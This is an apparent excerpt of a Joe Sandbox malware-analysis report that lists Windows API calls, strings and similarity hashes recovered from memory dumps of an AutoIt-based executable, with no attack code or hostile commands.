                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LongWindow
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 1378638983-2063206799
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E8146F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E410E2,?,?,?,00E2100A), ref: 00E3FAD9
                                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00E2100A), ref: 00E410E6
                                                                                                                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E2100A), ref: 00E410F5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E410F0
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                                    • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00E3F151
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                    • String ID: `5$h5
                                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-2563461917
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00E939F0
                                                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00E93A05
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                                    • String ID: aut
                                                                                                                                                                                                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EB2E08
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000), ref: 00EB2E0F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8F292: Sleep.KERNEL32 ref: 00E8F30A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EB2DC8
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EB2DDB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8F292: Sleep.KERNEL32 ref: 00E8F30A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00E5C213
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E5C221
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E5C27C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: e03ed64fe6b28dbcfcb881f0d1c81c9e21a42604456118ae4f7ae5bcd93c6a49
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0fc78b4289c1ca97b8dc5ca574bd170c5a346d3f768ed5343611fda31fd35690
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e03ed64fe6b28dbcfcb881f0d1c81c9e21a42604456118ae4f7ae5bcd93c6a49
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF410734604B05AFCB218FE5C854ABA7BE4EF0171AF345569EC55B71B1DB308C09C760